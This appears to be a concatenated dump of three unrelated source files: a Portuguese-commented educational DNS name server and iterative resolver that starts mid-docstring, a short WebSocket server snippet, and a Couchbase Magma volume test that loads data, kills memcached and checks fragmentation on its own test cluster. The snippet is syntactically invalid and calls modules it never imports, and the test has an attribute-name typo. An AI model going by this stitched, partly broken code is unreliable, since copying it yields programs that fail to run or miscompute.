dos filhos level 3, e assim por diante.
host -- Endereço IP do servidor.
port -- Porta do servidor.
"""
def __init__(self, name: str, level: int, host: str, port: int):
super(NameServer, self).__init__()
self.name = name
self.daemon = True
self.address = '{}:{}'.format(host, port)
self._level = level
self._host = host
self._port = port
self._lut = {} # lookup table para os registros DNS
def add_record(self, domain: str, address: str):
"""Adiciona um novo registro de subdomínio a este domínio.
Os registros são compostos de um nome de domínio, que é a chave
para a lookup table (lut) e um endereço no formato 'IP:PORT'.
"""
self._lut[domain] = address
def name_lookup(self, lookupname: str) -> (bool, str, str):
"""Faz o lookup do nome requerido.
Dado o lookupname verifica se o endereço do nome requerido está
na tabela de lookup. Se o endereço não for encontrado, verifica
qual servidor de nome pode responder o endereço requerido e
encaminha o endereço do mesmo. Se não encontrar um servidor de
nomes que responda pelo domínio, retorna que o nome não foi
encontrado. A estrutura de retorno é uma tripla, sendo o primeiro
campo uma flag para indicar se encontrou algum registro que
responde pelo endereço, o segundo é nome do domínio e o terceiro
é o endereço correspondente ao domínio.
"""
try:
address = self._lut[lookupname]
return (True, lookupname, address)
except KeyError:
pass
splitted = lookupname.split('.')
domain = '.'.join(splitted[-self._level:])
try:
address = self._lut[domain]
return (True, domain, address)
except KeyError:
return (False, None, None)
def handler(self, conn):
"""Trata uma requisição do cliente.
Quando um resolvedor conecta no servidor, uma nova Thread é
criada para gerenciar a conexão estabelecida, e tratar a
as requisições de resolução de nomes.
"""
lookupname = conn.recv(1024)
lookupname = lookupname.decode('utf-8')
found, nsname, addr = self.name_lookup(lookupname)
response_content = {
'found': found,
'nsname': nsname,
'addr': addr
}
response = json.dumps(response_content)
conn.sendall(response.encode('utf-8'))
def run(self):
"""Executa o servidor
Função principal do servidor, mantém o servidor ativo aguardando
conexões ou para quando ocorre uma interrupção de teclado.
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.bind((self._host, self._port))
sock.listen(4) # aceita até 4 conexões simultâneas
logging.info("Listening on '%s'", self.address)
try:
while True:
(conn, addrinfo) = sock.accept()
logging.info("Connected by '%s'", addrinfo)
threading.Thread(target=self.handler, args=(conn,)).start()
except KeyboardInterrupt:
pass
class ResolverIter(object):
"""Resolvedor de nomes pelo método iterativo."""
def __init__(self):
super(ResolverIter, self).__init__()
self._cache = {
'.': '127.0.0.1:10000'
}
def name_lookup(self, lookupname: str) -> str:
"""Resolve um nome e retorna um objeto JSON com sua resolução."""
def dolookup(address):
"""Solicita uma resolução com o servidor de nomes no endereço
address no formato ip:porta.
Retorna o valor respondido pela conexão."""
(host, port) = address.split(':')
port = int(port)
with socket.create_connection((host, port)) as conn:
conn.sendall(lookupname.encode('utf-8'))
response = conn.recv(1024)
response = response.decode('utf-8')
logging.info('Response: %s', response)
response_content = json.loads(response)
return response_content
logging.info("Resolvendo '%s'", lookupname)
try:
# Procura primeiramente na cache e se encontrar retorna.
address = self._cache[lookupname]
logging.info("Endereço encontrado em cache '%s'", address)
return address
except KeyError:
pass
# inicia a resolução pelo servidor de nomes raiz
rootaddr = self._cache['.']
response_content = dolookup(rootaddr)
if not response_content['found']:
# Nome não encontrado retorna erro!
logging.info("Endereço não encontrado!")
return 'Não encontrado!'
# verifica se endereço encontrado é o requerido
while response_content['nsname'] != lookupname:
# se não for procura iterativamente pela árvore de servidores.
response_content = dolookup(response_content['addr'])
if not response_content['found']:
logging.info("Endereço não encontrado!")
return 'Não encontrado!'
logging.info("Endereço encontrado '%s'", response_content['addr'])
# Atualiza endereço na cache
self._cache[response_content['nsname']] = response_content['addr']
# Retorna o endereço encontrado
return response_content['addr']
|
SimpleSocket.py
|
from typing import Any, Union
from SimpleWebSocketServer import SimpleExampleServer, WebSocket
import cv2
import math
clients = [], server = None
class RunSocket():
def __init__(self):
pass
def RUN(self):
class SimpleWSServer(WebSocket):
def handleConnected(self):
clients.append(self)
def handleClose(self):
clients.remove(self)
def run_server():
global server
server = SimpleWebSocketServer( 9000, SimpleWSServer,
selectInterval = (1000.0 / 15) / 1000)
server.serveforever()
t = threading.Thread(target=run_server)
t.start()
|
Magma.py
|
'''
Created on Mar 29, 2020
@author: riteshagarwal
'''
import random
from BucketLib.BucketOperations import BucketHelper
from BucketLib.bucket import Bucket
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from couchbase_helper.documentgenerator import doc_generator
from error_simulation.cb_error import CouchbaseError
from membase.api.rest_client import RestConnection, RestHelper
from remote.remote_util import RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView
from Cb_constants.CBServer import CbServer
import os
from memcached.helper.data_helper import MemcachedClientHelper
from cb_tools.cbstats import Cbstats
import threading
import time
from custom_exceptions.exception import RebalanceFailedException
import math
import subprocess
from math import ceil
from Jython_tasks.task_manager import TaskManager as local_tm
import copy
from com.couchbase.test.taskmanager import TaskManager
from com.couchbase.test.sdk import Server, SDKClient
from com.couchbase.test.sdk import SDKClient as NewSDKClient
from com.couchbase.test.docgen import WorkLoadSettings,\
DocumentGenerator
from com.couchbase.test.loadgen import WorkLoadGenerate
from com.couchbase.test.docgen import DocRange
from java.util import HashMap
from couchbase.test.docgen import DRConstants
from com.couchbase.test.key import SimpleKey
from com.couchbase.client.core.error import DocumentExistsException,\
TimeoutException, DocumentNotFoundException, ServerOutOfMemoryException
class volume(BaseTestCase):
def init_doc_params(self):
self.create_perc = 100
self.update_perc = self.input.param("update_perc", 50)
self.delete_perc = self.input.param("delete_perc", 50)
self.expiry_perc = self.input.param("expiry_perc", 0)
self.read_perc = self.input.param("read_perc", 100)
self.start = 0
self.end = 0
self.initial_items = self.start
self.final_items = self.end
self.create_end = 0
self.create_start = 0
self.read_start = 0
self.read_end = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
def setUp(self):
BaseTestCase.setUp(self)
self.init_doc_params()
self.num_collections = self.input.param("num_collections", 1)
self.num_scopes = self.input.param("num_scopes", 1)
self.num_buckets = self.input.param("num_buckets", 1)
self.doc_ops = self.input.param("doc_ops", "create")
self.mutation_perc = 100
if self.doc_ops:
self.doc_ops = self.doc_ops.split(':')
self.max_tasks_per_collection = 8
process_concurrency = int(math.ceil(self.max_tasks_per_collection /
float(len(self.doc_ops))))
process_concurrency = self.input.param("pc", process_concurrency)
doc_tasks = (self.num_buckets*self.num_scopes*self.num_collections) * len(self.doc_ops) * process_concurrency + 2
self.thread_to_use = min(64, doc_tasks)
self.input.test_params.update({"threads_to_use":
self.thread_to_use})
self.log.critical("Total Doc-Tasks workers = %s" % self.thread_to_use)
self.log.critical("Total Doc-Tasks = %s" % doc_tasks)
self.doc_loading_tm = local_tm(number_of_threads=self.thread_to_use)
self.process_concurrency = self.input.param("pc", process_concurrency)
self.rest = RestConnection(self.servers[0])
self.op_type = self.input.param("op_type", "create")
self.dgm = self.input.param("dgm", None)
self.available_servers = self.cluster.servers[self.nodes_init:]
self.num_buckets = self.input.param("num_buckets", 1)
self.mutate = 0
self.iterations = self.input.param("iterations", 2)
self.step_iterations = self.input.param("step_iterations", 1)
self.rollback = self.input.param("rollback", True)
self.vbucket_check = self.input.param("vbucket_check", True)
self.new_num_writer_threads = self.input.param(
"new_num_writer_threads", 6)
self.new_num_reader_threads = self.input.param(
"new_num_reader_threads", 8)
self.end_step = self.input.param("end_step", None)
self.key_prefix = "Users"
self.crashes = self.input.param("crashes", 20)
self.check_dump_thread = True
self.skip_read_on_error = False
self.suppress_error_table = False
self.track_failures = True
self.loader_dict = None
self.parallel_reads = self.input.param("parallel_reads", False)
self._data_validation = self.input.param("data_validation", True)
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.fragmentation = int(self.input.param("fragmentation", 50))
self.cursor_dropping_checkpoint = self.input.param(
"cursor_dropping_checkpoint", None)
self.assert_crashes_on_load = self.input.param("assert_crashes_on_load",
True)
#######################################################################
self.PrintStep("Step 1: Create a %s node cluster" % self.nodes_init)
if self.nodes_init > 1:
nodes_init = self.cluster.servers[1:self.nodes_init]
self.task.rebalance([self.cluster.master], nodes_init, [])
self.cluster.nodes_in_cluster.extend(
[self.cluster.master] + nodes_init)
else:
self.cluster.nodes_in_cluster.extend([self.cluster.master])
self.cluster_util.set_metadata_purge_interval(self.cluster.master)
#######################################################################
self.PrintStep("Step 2: Create required buckets and collections.")
self.create_required_buckets()
props = "magma"
update_bucket_props = False
if self.disable_magma_commit_points:
props += ";magma_max_commit_points=0"
update_bucket_props = True
if self.cursor_dropping_checkpoint:
props += ";cursor_dropping_checkpoint_mem_upper_mark=%s" %\
str(self.cursor_dropping_checkpoint)
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.sleep(10, "Sleep for 10 seconds so that collections \
can be created")
else:
for node in self.servers:
shell = RemoteMachineShellConnection(node)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
self.scope_name = self.input.param("scope_name",
CbServer.default_scope)
if self.scope_name != CbServer.default_scope:
self.bucket_util.create_scope(self.cluster.master,
self.bucket,
{"name": self.scope_name})
if self.num_scopes > 1:
self.scope_prefix = self.input.param("scope_prefix",
"VolumeScope")
for bucket in self.cluster.buckets:
for i in range(self.num_scopes):
scope_name = self.scope_prefix + str(i)
self.log.info("Creating scope: %s"
% (scope_name))
self.bucket_util.create_scope(self.cluster.master,
bucket,
{"name": scope_name})
self.sleep(0.5)
self.num_scopes += 1
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
if self.num_collections >= 1:
self.collection_prefix = self.input.param("collection_prefix",
"VolumeCollection")
for i in range(self.num_collections):
collection_name = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection_name})
self.sleep(0.5)
# self.num_collections += 1
self.rest = RestConnection(self.cluster.master)
self.assertTrue(self.rest.update_autofailover_settings(False, 600),
"AutoFailover disabling failed")
if self.sdk_client_pool:
max_clients = min(self.task_manager.number_of_threads,
20)
clients_per_bucket = int(ceil(max_clients / self.num_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket,
[self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
self.retry_exceptions = None
self.ignore_exceptions = None
self.key_type = self.input.param("key_type", "SimpleKey")
self.ops_rate = self.input.param("ops_rate", 10000)
def tearDown(self):
self.check_dump_thread = False
self.stop_crash = True
BaseTestCase.tearDown(self)
def get_memory_footprint(self):
out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],stdout=subprocess.PIPE).communicate()[0].split(b'\n')
vsz_index = out[0].split().index(b'RSS')
mem = float(out[1].split()[vsz_index]) / 1024
self.PrintStep("RAM FootPrint: %s" % str(mem))
return mem
def create_required_buckets(self):
self.log.info("Get the available memory quota")
self.info = self.rest.get_nodes_self()
# threshold_memory_vagrant = 100
kv_memory = self.info.memoryQuota - 100
# Creating buckets for data loading purpose
self.log.info("Create CB buckets")
self.bucket_expiry = self.input.param("bucket_expiry", 0)
ramQuota = self.input.param("ramQuota", kv_memory)
buckets = ["GleamBookUsers"]*self.num_buckets
self.bucket_type = self.bucket_type.split(';')*self.num_buckets
self.compression_mode = self.compression_mode.split(';')*self.num_buckets
self.bucket_eviction_policy = self.bucket_eviction_policy
for i in range(self.num_buckets):
bucket = Bucket(
{Bucket.name: buckets[i] + str(i),
Bucket.ramQuotaMB: ramQuota/self.num_buckets,
Bucket.maxTTL: self.bucket_expiry,
Bucket.replicaNumber: self.num_replicas,
Bucket.storageBackend: self.bucket_storage,
Bucket.evictionPolicy: self.bucket_eviction_policy,
Bucket.bucketType: self.bucket_type[i],
Bucket.flushEnabled: Bucket.FlushBucket.ENABLED,
Bucket.compressionMode: self.compression_mode[i],
Bucket.fragmentationPercentage: self.fragmentation})
self.bucket_util.create_bucket(self.cluster, bucket)
# rebalance the new buckets across all nodes.
self.log.info("Rebalance Starts")
self.nodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[])
self.rest.monitorRebalance()
def set_num_writer_and_reader_threads(self, num_writer_threads="default",
num_reader_threads="default"):
for node in self.cluster_util.get_kv_nodes(self.cluster):
bucket_helper = BucketHelper(node)
bucket_helper.update_memcached_settings(
num_writer_threads=num_writer_threads,
num_reader_threads=num_reader_threads,
num_storage_threads="default")
def generate_docs(self, doc_ops=None,
create_end=None, create_start=None,
update_end=None, update_start=None,
delete_end=None, delete_start=None,
expire_end=None, expire_start=None,
read_end=None, read_start=None):
self.get_memory_footprint()
self.create_end = 0
self.create_start = 0
self.read_end = 0
self.read_start = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
self.initial_items = self.final_items
doc_ops = doc_ops or self.doc_ops
self.mutations_to_validate = doc_ops
if "read" in doc_ops:
if read_start is not None:
self.read_start = read_start
else:
self.read_start = 0
if read_end is not None:
self.read_end = read_end
else:
self.read_end = self.num_items * self.mutation_perc/100
if "update" in doc_ops:
if update_start is not None:
self.update_start = update_start
else:
self.update_start = 0
if update_end is not None:
self.update_end = update_end
else:
self.update_end = self.num_items * self.mutation_perc/100
self.mutate += 1
if "delete" in doc_ops:
if delete_start is not None:
self.delete_start = delete_start
else:
self.delete_start = self.start
if delete_end is not None:
self.delete_end = delete_end
else:
self.delete_end = self.start + self.num_items * self.mutation_perc/100
self.final_items -= (self.delete_end - self.delete_start) * self.num_collections * self.num_scopes
if "expiry" in doc_ops:
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
if expire_start is not None:
self.expire_start = expire_start
else:
self.expire_start = self.delete_end
if expire_end is not None:
self.expire_end = expire_end
else:
self.expire_end = self.expiry_start + self.num_items * self.mutation_perc/100
self.final_items -= (self.expire_end - self.expire_start) * self.num_collections * self.num_scopes
if "create" in doc_ops:
if create_start is not None:
self.create_start = create_start
else:
self.create_start = self.end
self.start = self.create_start
if create_end is not None:
self.create_end = create_end
else:
self.create_end = self.end + (self.expire_end - self.expire_start) + (self.delete_end - self.delete_start)
self.end = self.create_end
self.final_items += (abs(self.create_end - self.create_start)) * self.num_collections * self.num_scopes
print "Read Start: %s" % self.read_start
print "Read End: %s" % self.read_end
print "Update Start: %s" % self.update_start
print "Update End: %s" % self.update_end
print "Delete Start: %s" % self.delete_start
print "Delete End: %s" % self.delete_end
print "Expiry End: %s" % self.expire_start
print "Expiry End: %s" % self.expire_end
print "Create Start: %s" % self.create_start
print "Create End: %s" % self.create_end
print "Final Start: %s" % self.start
print "Final End: %s" % self.end
def data_load(self, cmd=dict()):
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", self.create_perc),
cmd.get("rd", self.read_perc),
cmd.get("up", self.update_perc),
cmd.get("dl", self.delete_perc),
cmd.get("ex", self.expiry_perc),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", False),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0)
)
hm = HashMap()
hm.putAll({DRConstants.create_s: self.create_start,
DRConstants.create_e: self.create_end,
DRConstants.update_s: self.update_start,
DRConstants.update_e: self.update_end,
DRConstants.expiry_s: self.expire_start,
DRConstants.expiry_e: self.expire_end,
DRConstants.delete_s: self.delete_start,
DRConstants.delete_e: self.delete_end,
DRConstants.read_s: self.read_start,
DRConstants.read_e: self.read_end})
dr = DocRange(hm)
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Loader_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection],
client, self.durability_level,
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
return tasks
def wait_for_doc_load_completion(self, tasks, wait_for_stats=True):
self.tm.getAllTaskResult()
for task in tasks:
task.result = True
for optype, failures in task.failedMutations.items():
for failure in failures:
print("Test Retrying {}: {} -> {}".format(optype, failure.id(), failure.err().getClass().getSimpleName()))
if optype == "create":
try:
task.docops.insert(failure.id(), failure.document(), task.sdk.connection, task.setOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry Create failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "update":
try:
task.docops.upsert(failure.id(), failure.document(), task.sdk.connection, task.upsertOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry update failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "delete":
try:
task.docops.delete(failure.id(), task.sdk.connection, task.removeOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry delete failed for key: " + failure.id())
task.result = False
except DocumentNotFoundException as e:
pass
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
self.assertTrue(task.result, "Task Failed: {}".format(task.taskName))
if wait_for_stats:
try:
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=1200)
self.bucket_util.verify_stats_all_buckets(self.cluster, self.final_items)
except Exception as e:
self.get_gdb()
raise e
def get_gdb(self):
for node in self.cluster.nodes_in_cluster:
gdb_shell = RemoteMachineShellConnection(node)
gdb_out = gdb_shell.execute_command('gdb -p `(pidof memcached)` -ex "thread apply all bt" -ex detach -ex quit')[0]
self.log.critical("GDB bt logs from node: %s\n %s"
% (node.ip, gdb_out))
gdb_shell.disconnect()
def data_validation(self):
doc_ops = self.mutations_to_validate
if self._data_validation:
self.log.info("Validating Active/Replica Docs")
cmd = dict()
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
cmd.update({"deleted": False})
hm = HashMap()
if op_type == "create":
hm.putAll({DRConstants.read_s: self.create_start,
DRConstants.read_e: self.create_end})
elif op_type == "update":
hm.putAll({DRConstants.read_s: self.update_start,
DRConstants.read_e: self.update_end})
elif op_type == "delete":
hm.putAll({DRConstants.read_s: self.delete_start,
DRConstants.read_e: self.delete_end})
cmd.update({"deleted": True})
else:
continue
dr = DocRange(hm)
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", 0),
cmd.get("rd", 100),
cmd.get("up", 0),
cmd.get("dl", 0),
cmd.get("ex", 0),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", True),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0))
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection+op_type: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
if op_type not in ["create", "update", "delete"]:
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Validate_%s_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, op_type, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection+op_type],
client, "NONE",
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
self.tm.getAllTaskResult()
for task in tasks:
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
for task in tasks:
self.assertTrue(task.result, "Validation Failed for: %s" % task.taskName)
def get_bucket_dgm(self, bucket):
self.rest_client = BucketHelper(self.cluster.master)
count = 0
dgm = 100
while count < 5:
try:
dgm = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Active Resident Threshold of {0} is {1}".format(
bucket.name, dgm))
return dgm
except Exception as e:
self.sleep(5, e)
count += 1
return dgm
def _induce_error(self, error_condition, nodes=[]):
nodes = nodes or [self.cluster.master]
for node in nodes:
if error_condition == "stop_server":
self.cluster_util.stop_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.start_firewall_on_node(self.cluster, node)
elif error_condition == "kill_memcached":
self.cluster_util.kill_memcached(self.cluster, node=node)
elif error_condition == "reboot_server":
shell = RemoteMachineShellConnection(node)
shell.reboot_node()
elif error_condition == "kill_erlang":
shell = RemoteMachineShellConnection(node)
shell.kill_erlang()
self.sleep(self.sleep_time * 3)
shell.disconnect()
else:
self.fail("Invalid error induce option")
def _recover_from_error(self, error_condition):
for node in self.cluster.nodes_in_cluster:
if error_condition == "stop_server" or error_condition == "kill_erlang":
self.cluster_util.start_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.stop_firewall_on_node(self.cluster, node)
for node in self.cluster.nodes_in_cluster:
result = self.cluster_util.wait_for_ns_servers_or_assert([node],
wait_time=1200)
self.assertTrue(result, "Server warmup failed")
self.check_warmup_complete(node)
def rebalance(self, nodes_in=0, nodes_out=0,
retry_get_process_num=3000):
self.servs_in = random.sample(self.available_servers, nodes_in)
self.nodes_cluster = self.cluster.nodes_in_cluster[:]
self.nodes_cluster.remove(self.cluster.master)
self.servs_out = random.sample(self.nodes_cluster, nodes_out)
if nodes_in == nodes_out:
self.vbucket_check = False
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init],
self.servs_in, self.servs_out,
check_vbucket_shuffling=self.vbucket_check,
retry_get_process_num=retry_get_process_num)
self.available_servers = [servs for servs in self.available_servers
if servs not in self.servs_in]
self.available_servers += self.servs_out
self.cluster.nodes_in_cluster.extend(self.servs_in)
self.cluster.nodes_in_cluster = list(set(self.cluster.nodes_in_cluster)
- set(self.servs_out))
return rebalance_task
def print_crud_stats(self):
self.table = TableView(self.log.info)
self.table.set_headers(["Initial Items",
"Current Items",
"Items Updated",
"Items Created",
"Items Deleted",
"Items Expired"])
self.table.add_row([
str(self.initial_items),
str(self.final_items),
str(abs(self.update_start)) + "-" + str(abs(self.update_end)),
str(abs(self.create_start)) + "-" + str(abs(self.create_end)),
str(abs(self.delete_start)) + "-" + str(abs(self.delete_end)),
str(abs(self.expire_start)) + "-" + str(abs(self.expire_end))
])
self.table.display("Docs statistics")
def perform_load(self, crash=False, num_kills=1, wait_for_load=True,
validate_data=True):
task = self.data_load()
if wait_for_load:
self.wait_for_doc_load_completion(task)
else:
return task
if crash:
self.kill_memcached(num_kills=num_kills)
if validate_data:
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
def print_stats(self):
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
self.check_fragmentation_using_magma_stats(bucket)
self.check_fragmentation_using_kv_stats(bucket)
def check_fragmentation_using_kv_stats(self, bucket, servers=None):
result = dict()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
frag_val = self.bucket_util.get_fragmentation_kv(
self.cluster, bucket, server)
self.log.debug("Current Fragmentation for node {} is {} \
".format(server.ip, frag_val))
result.update({server.ip: frag_val})
self.log.info("KV stats fragmentation values {}".format(result))
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
stats = list()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(server.ip,
output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(bucket, shell,
field_to_grep=grep_field)
fragmentation_values.append(float(_res[server.ip][grep_field]
["Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
shell.disconnect()
res = list()
for value in result.values():
res.append(max(value))
if max(res) < float(self.fragmentation)/100:
self.log.info("magma stats fragmentation result {} \
".format(result))
return True
self.log.info("magma stats fragmentation result {} \
".format(result))
self.log.info(stats)
return False
def get_magma_stats(self, bucket, shell=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
magma_stats_for_all_servers[shell.ip] = result
return magma_stats_for_all_servers
def get_magma_disk_usage(self, bucket=None):
if bucket is None:
bucket = self.bucket
servers = self.cluster.nodes_in_cluster
kvstore = 0
wal = 0
keyTree = 0
seqTree = 0
data_files = 0
for server in servers:
shell = RemoteMachineShellConnection(server)
bucket_path = os.path.join(RestConnection(server).get_data_path(),bucket.name)
kvstore += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*"))[0][0].split('\n')[0])
wal += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/wal"))[0][0].split('\n')[0])
keyTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/key*"))[0][0].split('\n')[0])
seqTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/seq*"))[0][0].split('\n')[0])
cmd = 'find ' + bucket_path + '/magma*/ -maxdepth 1 -type d \
-print0 | while read -d "" -r dir; do files=("$dir"/*/*/*); \
printf "%d,%s\n" "${#files[@]}" "$dir"; done'
data_files = shell.execute_command(cmd)[0]
for files in data_files:
if "kvstore" in files and int(files.split(",")[0]) >= 300:
self.log.warn("Number of files in {}--{} is {}".format(
server.ip, files.split(",")[1].rstrip(), files.split(",")[0]))
shell.disconnect()
self.log.debug("Total Disk usage for kvstore is {}MB".format(kvstore))
self.log.debug("Total Disk usage for wal is {}MB".format(wal))
self.log.debug("Total Disk usage for keyTree is {}MB".format(keyTree))
self.log.debug("Total Disk usage for seqTree is {}MB".format(seqTree))
return kvstore, wal, keyTree, seqTree
def crash_thread(self, nodes=None, num_kills=1, graceful=False):
self.stop_crash = False
self.crash_count = 0
if not nodes:
nodes = self.cluster.nodes_in_cluster
while not self.stop_crash:
self.get_memory_footprint()
sleep = random.randint(60, 120)
self.sleep(sleep,
"Iteration:{} waiting to kill memc on all nodes".
format(self.crash_count))
self.kill_memcached(nodes, num_kills=num_kills,
graceful=graceful, wait=True)
self.crash_count += 1
if self.crash_count > self.crashes:
self.stop_crash = True
self.sleep(300)
def kill_memcached(self, servers=None, num_kills=1,
graceful=False, wait=True):
if not servers:
servers = self.cluster.nodes_in_cluster
for _ in xrange(num_kills):
self.sleep(5, "Sleep for 5 seconds between continuous memc kill")
for server in servers:
shell = RemoteMachineShellConnection(server)
if graceful:
shell.restart_couchbase()
else:
shell.kill_memcached()
shell.disconnect()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
if wait:
for server in servers:
self.check_warmup_complete(server)
def check_dump(self):
count = 1
shells = list()
for server in self.cluster.nodes_in_cluster:
shells.append(RemoteMachineShellConnection(server))
while self.check_dump_thread:
self.log.debug("Checking crashes {}".format(count))
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.check_dump_thread = False
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
for shell in shells:
for bucket in self.cluster.buckets:
output = shell.execute_command(
'/opt/couchbase/bin/cbstats localhost:11210 memory \
-u Administrator -p password -b {} | grep -e \
ep_arena:resident -e ep_arena:allocated \
-e mem_used:'.format(bucket.name))[0]
self.log.debug("{}: {}".format(shell.ip,
output[0].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[1].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[2].replace(" ", "")
.strip()))
self.sleep(60)
count += 1
for shell in shells:
shell.disconnect()
